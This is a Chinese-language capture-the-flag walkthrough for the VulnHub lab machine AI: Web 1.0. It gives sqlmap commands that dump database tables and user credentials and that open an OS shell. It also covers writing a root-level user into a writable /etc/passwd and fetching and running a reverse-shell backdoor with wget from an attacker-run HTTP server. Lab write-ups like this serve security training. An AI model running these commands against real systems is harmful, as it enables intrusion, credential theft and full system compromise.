VulnHub_AI_Web_1.0

一个粗糙的信息收集
使用nmap探测目标主机开放端口

访问robots.txt

访问http://192.168.31.126/se3reTdir777/

猜测可能存在注入点，使用Sqlmap进行探测

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs

获取数据库中的表

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables

获取systemUser表中的字段名

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser --columns

获取字段内容

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser -C "userName,password" --dump

获取user表中内容

在数据库中没有获得有价值的信息
扫一下网站目录，找到一个info.php

访问页面发现是phpinfo

找到网站的物理路径

使用sqlmap获取shell

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell 
# 网站路径 
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

查看/etc/passwd权限，发现可以写入

使用卡里自带的openssl加密一下我们自己的账户

写入用户，UID,GID为0，根目录为root

尝试切换到test用户时提示需要一个终端

在本地写一个后门，使用wget下载的靶机

&3 2>&3");
?>

使用python搭建一个HTTP服务器

python -m SimpleHTTPServer 8080

使用wget下载到靶机

执行刚刚上传的文件

看到反弹回来一个shell

使用python创建一个交互式shell

切换用户，查看权限已经是root用户

查看flag